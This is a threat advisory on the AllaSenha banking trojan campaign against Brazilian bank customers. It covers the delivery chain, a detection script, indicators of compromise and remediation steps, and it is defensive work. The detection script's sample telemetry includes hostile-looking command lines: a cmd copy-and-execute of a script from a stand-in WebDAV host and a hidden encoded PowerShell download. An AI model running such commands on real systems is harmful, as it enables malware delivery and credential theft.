May 30, 2024
Severity
High
Analysis Summary
A recently observed campaign targeting users of Brazilian financial institutions distributes AllaSenha, a customized variant of the Windows-based AllaKore remote access trojan (RAT).
The malware uses Microsoft Azure cloud infrastructure for command and control (C2) and aims to steal the credentials needed to access Brazilian bank accounts. Customers of Banco do Brasil, Bradesco, Banco Safra, Caixa Econômica Federal, Itaú Unibanco, Sicoob and Sicredi are among the targets. The initial access vector has not been confirmed, but the available evidence points to malicious links delivered in phishing emails.
The infection begins with a malicious Windows shortcut (LNK) file disguised as a PDF document ("NotaFiscal.pdf.lnk"), which has been hosted on a WebDAV server since at least March 2024. There is also evidence that the same threat actors previously hosted payloads on two legitimate platforms, GitHub and Autodesk A360 Drive.
When launched, the LNK file fetches a BAT payload named "c.cmd" from the same WebDAV server URL and starts a Windows command shell that opens a decoy PDF for the victim. This file, referred to as the BPyCode launcher, runs a Base64-encoded PowerShell command that downloads the Python binary from the official Python website and uses it to execute a Python script codenamed BPyCode.
BPyCode in turn acts as a downloader that loads a dynamic-link library ("executor.dll") in memory. The DLL is retrieved from one of the hostnames produced by a domain generation algorithm (DGA). Researchers noted that the generated hostnames appear to correspond to the Microsoft Azure Functions service, a serverless platform that lets the operators quickly deploy and rotate staging infrastructure.
BPyCode retrieves three files: a second Python loader script, a ZIP archive containing the PythonMemoryModule package, and another ZIP archive containing "executor.dll". The new loader script then uses PythonMemoryModule to load executor.dll, a Borland Delphi-based loader also known as ExecutorLoader, into memory. ExecutorLoader's main job is to decode AllaSenha and execute it by injecting it into a legitimate mshta.exe process.
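The chain described above (a shortcut fetched from a WebDAV share, Base64-encoded PowerShell that pulls down the Python interpreter, a Python stage that ends with AllaSenha injected into mshta.exe) gives a threat hunter several process-creation patterns to look for. The script below is an added example written for this advisory, not code from the campaign or from the researchers who analysed it. It runs a small set of heuristics over constructed Sysmon-style process-creation events; the host name webdav.example.net, the paths under C:\Users\Public\python, the script name stage2.py and the encoded PowerShell command are all made up for the example, and the rule that mshta.exe should appear as a child of python.exe is an assumption drawn from ExecutorLoader running inside the Python process.

```python
"""
Hunting heuristics for the AllaSenha delivery chain over process-creation
telemetry. The sample events are constructed for this example; host names,
paths and the encoded command are made up and are not real indicators.
"""
import base64
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]  # keys: image, parent_image, command_line

# Stage 1: the LNK/BAT stage is pulled from a WebDAV share (\\host@SSL\DavWWWRoot\...).
WEBDAV_RE = re.compile(r"(?i)(@SSL\\|\\DavWWWRoot\\|\\\\[\w.-]+\\.*\.(?:lnk|cmd|bat)\b)")
DOUBLE_EXT_LNK_RE = re.compile(r"(?i)\.(?:pdf|docx?|xlsx?)\.lnk\b")
# Stage 2: Base64-encoded PowerShell (-e / -ec / -en / -enc / -EncodedCommand).
ENCODED_PS_RE = re.compile(r"(?i)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
PYTHON_FETCH_RE = re.compile(r"(?i)python\.org|python-3[\d.]*-embed")
# Stage 3/4: an interpreter dropped into a user-writable path, then mshta.exe spawned by it.
USER_WRITABLE_RE = re.compile(r"(?i)\\(?:Users\\Public|AppData\\Local\\Temp|ProgramData)\\")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_disguised_lnk(filename: str) -> bool:
    """True for shortcuts wearing a document extension, e.g. NotaFiscal.pdf.lnk."""
    return bool(DOUBLE_EXT_LNK_RE.search(_basename(filename)))


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand payload (UTF-16LE) or '' if there is none."""
    m = ENCODED_PS_RE.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def match_event(ev: Event) -> List[str]:
    """Return the names of every heuristic the event triggers."""
    hits: List[str] = []
    image, parent, cmd = _basename(ev["image"]), _basename(ev["parent_image"]), ev["command_line"]
    if WEBDAV_RE.search(cmd):
        hits.append("script_fetched_from_webdav")
    if DOUBLE_EXT_LNK_RE.search(cmd):
        hits.append("double_extension_lnk")
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded:
            hits.append("encoded_powershell")
            if PYTHON_FETCH_RE.search(decoded):
                hits.append("encoded_powershell_fetches_python")
    if image in ("python.exe", "pythonw.exe") and USER_WRITABLE_RE.search(ev["image"]):
        hits.append("python_in_user_writable_path")
    # Assumption: ExecutorLoader runs inside the Python process, so the injected
    # mshta.exe should show up as a child of python.exe.
    if image == "mshta.exe" and parent in ("python.exe", "pythonw.exe"):
        hits.append("mshta_spawned_by_python")
    return hits


def hunt(events: List[Event]) -> Tuple[List[Tuple[int, str]], bool]:
    """Run all heuristics; the chain counts as confirmed when >= 3 distinct stages fire."""
    findings = [(i, h) for i, ev in enumerate(events) for h in match_event(ev)]
    return findings, len({h for _, h in findings}) >= 3


# Constructed sample telemetry (made up for this example, not observed data).
_ENCODED_STAGE = base64.b64encode(
    "(New-Object Net.WebClient).DownloadFile("
    "'https://www.python.org/ftp/python/3.12.3/python-3.12.3-embed-amd64.zip',"
    "'C:\\Users\\Public\\py.zip')".encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS: List[Event] = [
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"cmd.exe /c copy \\webdav.example.net@SSL\DavWWWRoot\c.cmd %TEMP%\c.cmd & %TEMP%\c.cmd"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _ENCODED_STAGE},
    {"image": r"C:\Users\Public\python\python.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"C:\Users\Public\python\python.exe C:\Users\Public\python\stage2.py"},
    {"image": r"C:\Windows\System32\mshta.exe", "parent_image": r"C:\Users\Public\python\python.exe",
     "command_line": "mshta.exe"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt"},  # benign control event
]

if __name__ == "__main__":
    found, confirmed = hunt(SAMPLE_EVENTS)
    for idx, rule in found:
        print(f"event {idx}: {rule}")
    print("chain confirmed:", confirmed)
```

The scoring is deliberately conservative: `hunt` only reports the chain as confirmed when three or more distinct stages fire, so a lone encoded PowerShell command in an administrator's session does not page anyone, while the combination of a WebDAV-fetched script, a Python interpreter in a user-writable directory and mshta.exe parented by that interpreter does. To run it against real Sysmon Event ID 1 records, map the Image, ParentImage and CommandLine fields onto the three keys.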
Beyond stealing online banking credentials from web browsers, AllaSenha can display overlay windows to capture two-factor authentication (2FA) codes and even trick a victim into scanning a QR code to approve a fraudulent transaction initiated by the attackers. Further analysis of the source code linked to the original LNK file and of AllaSenha samples indicates that a Portuguese-speaking threat actor is probably involved in developing the malware, although there is currently no evidence that the same actor is also operating it.
Latin America remains an especially productive source of this kind of cybercrime. Although these attackers almost exclusively target individuals in Latin America to obtain banking credentials, they frequently compromise devices belonging to businesses worldwide when those devices are used by Brazilian subsidiaries or employees.
Impact
- Financial Loss
- Credential Theft
- Command Execution
Indicators of Compromise
Domain Name
- nfe-digital.digital
MD5
- 07714040b1524405bbbed893cdd74b94
- ce3a895eb2270dc891369cca221defef
- f55c6664ff3833ccdc6a05e4bbd4c820
- cd4f87e63be918ec6ef8d39082669834
- 0a01bb1fcda802b0bba56bd1a777fc3e
- 6a0910e448e860725341a0c2604aaad5
- f71a93619cdb9cb1ac9496af78ae7a63
- d5649324acdda023dd0d010f59939989
- 134c369ee48111df0c5b4fdb209b0f58
- f150e25fc167967153fce6281d00b6f4
- b52d69caf00e623cca80fe8f3e4b2cd0
- 33347a93efa03a601d3325a5b1adc2bb
- 59ea2e8001a4b64c8f6bb14a3cce4ae9
SHA-256
- f848c0f66afc7b5a10f060c1db129529a974ae0ad71a767f7c7793351bb7ca04
- c300749ea44f886be1887b3e19b946efbdbbc3e1bf3e416c78cfbff8d23bf70a
- 0d94547a0b8f9795e97e2a4a58b0ece65b4ea4b6e6019cbc96e1c79f373b4587
- a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef
- 21e22c4736e7567b198b505ed303c3ca933e0c2d931b886756f6db18a9884a75
- 2c1251ae1ec9d417bbbdd1f6ac99baa3f16a7639d0c12cb2883ef8c22c73e58e
- e50bde1e319e699f587d3b5403c487e46deed61cc3f078fe951e7cb9f6896259
- f00cb0603c055c85c7cdf9963d919d527b13013c182dc115ba733d28da57b1d9
- 4546bc56c85ad2967859dc34b2c84f15891fcd192e86bfc630c49dc8d59e3e71
- 643563613fb78f88fd90a6cf253ace9e9e6686568fdf6b6d7ec9760667d4d72b
- 6149a3d1cff3afe3ebb9ac091844a3b7db7533aa69801c98d00b19cdb8b18c9e
- 3b0eb25ed6c0dff76a613bdcfd20ca1d2f482e3c1739747bf50834ca784e66bb
- b152346c2679392d7e15d1cc72a39a21d24e55360c4c1c845ef3524924e93fa9
SHA-1
- 1ad79a184722a5b29db1046475d5b987da976589
- efd86577edd62e058ace9644628c6715db170653
- 7a988f7c9116e43c9b938c4e5ed7036adf9af1b8
- 77a144bb45fff156050324b8318741bcae27d9f8
- 40cb5d8b1e78463f5be09f1bdaaea08423eaca8b
- 6384b5697d6c242885bb4883d3ab8ccef1655f2f
- f06426f4bf15fd2bbc6628708667a475cd818898
- 96b37b9c15f517f65ff9b4237ae228c6f504f82a
- 71b1bd839c09e5bd24c3513eb7a2e51f6a3b5164
- 350cb22deef16cc5d755ea572484a3e01c48f6f2
- 9af9677c43c819617cdf221df3ffca11589a026e
- 9451985c7ce2c97ac1246074ee813c6588a548b3
- d7671efbc4cac4cc12429b657ad30758913f2373
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Hunt for the delivery chain described above: shortcut files with a double extension (for example .pdf.lnk) opened from WebDAV shares, Base64-encoded PowerShell commands that download the Python interpreter from python.org, and mshta.exe processes spawned by a Python interpreter.
- Where WebDAV access is not required, disable the WebClient service on endpoints so that shortcut files and scripts cannot be fetched from remote WebDAV shares.
- Ensure that all operating systems, software, and applications are regularly updated with the latest security patches.
- Conduct regular security awareness training for users to recognize and avoid phishing emails.
- Enable antivirus and anti-malware software and update signature definitions promptly. Multi-layered protection is necessary to secure vulnerable assets.
- Along with network and system hardening, implement code hardening within the organization so that its websites and software are secure. Use testing tools to detect vulnerabilities in deployed code.
- Implement network segmentation to limit lateral movement within the network.
- Implement continuous monitoring of network traffic and endpoint activities to detect any unusual or suspicious behavior.
- Develop and regularly test an incident response plan to ensure a swift and effective response in case of a security incident.
- Implement SIEM solutions to centralize log collection and analysis. This can help in identifying patterns of suspicious behavior and provide timely alerts for potential security incidents.
- Regularly back up critical data and ensure that the backup copies are stored securely.